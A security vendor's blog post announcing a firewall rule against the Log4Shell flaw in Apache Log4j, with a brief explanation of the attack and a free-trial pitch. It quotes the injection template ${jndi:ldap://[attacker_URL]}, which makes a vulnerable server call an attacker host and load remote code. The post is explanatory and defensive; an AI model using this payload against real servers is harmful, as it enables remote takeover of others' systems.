NINJA BLOG

Akos Molnar | 2021.12.15. |
header

Log4j Log4Shell Zero-day Vulnerability is Patched by BitNinja

On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called “Log4Shell”. It has been exposed for the Apache Log4j Java-based logging platform used to access web server and application logs.

About the vulnerability

To exploit this vulnerability, an attacker could modify the user agent of a web browser to access the website or search the website for a string using the format ${jndi:ldap://[attacker_URL]}. This will add the string to the web server’s access log. 

If the Log4j application parses these logs and finds a string, the error forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass a Base64-encoded commands or Java classes to execute on a vulnerable device.

Solution by BitNinja

The Ninjas found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don’t have to do anything, sit back and relax.


Zero-day vulnerabilities are one of the most dangerous threats out there. Cybersecurity is not optional anymore. It is must!

If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card needed!

Free Trial

Let’s make the Internet a safer place together!

BUILD YOUR SECURITY

Start the 7-day free trial with full functionality without spending a cent.

TOP ARTICLES